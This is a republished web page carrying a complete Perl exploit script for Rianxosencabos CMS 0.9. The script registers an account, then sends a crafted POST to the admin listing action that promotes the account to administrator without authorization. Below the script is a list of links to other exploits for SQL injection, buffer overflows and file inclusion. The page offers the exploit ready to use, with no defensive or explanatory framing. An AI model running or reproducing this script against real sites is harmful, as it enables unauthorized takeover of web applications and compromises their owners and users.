手机
当前位置:查字典教程网 >网络安全 >Exploit >Rianxosencabos CMS 0.9 Remote Add Admin Exploit
Rianxosencabos CMS 0.9 Remote Add Admin Exploit
摘要:#!/usr/bin/perl-w#RianxosencabosCMS0.9RemoteAddAdminExploit#Download:h...

#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit

# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){

print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>n";

print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2n";

exit 1;

} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;

$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;

$req->content_type('application/x-www-form-urlencoded') ;

$req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;

my $location = $res->header('Location') ;

if ($location =~ /Usuario creado/i) {

print "[ ] user added: ".$login ;

print "n[ ] password: ".$pass, "n" ;

} else{

print "[-] Exploit Failed!n" ;

}

} &__CREATE ; sub __ADMIN {

my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;

} &__ADMIN ;

__END__

【Rianxosencabos CMS 0.9 Remote Add Admin Exploit】相关文章:

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

上一篇: iGaming CMS
精品推荐
分类导航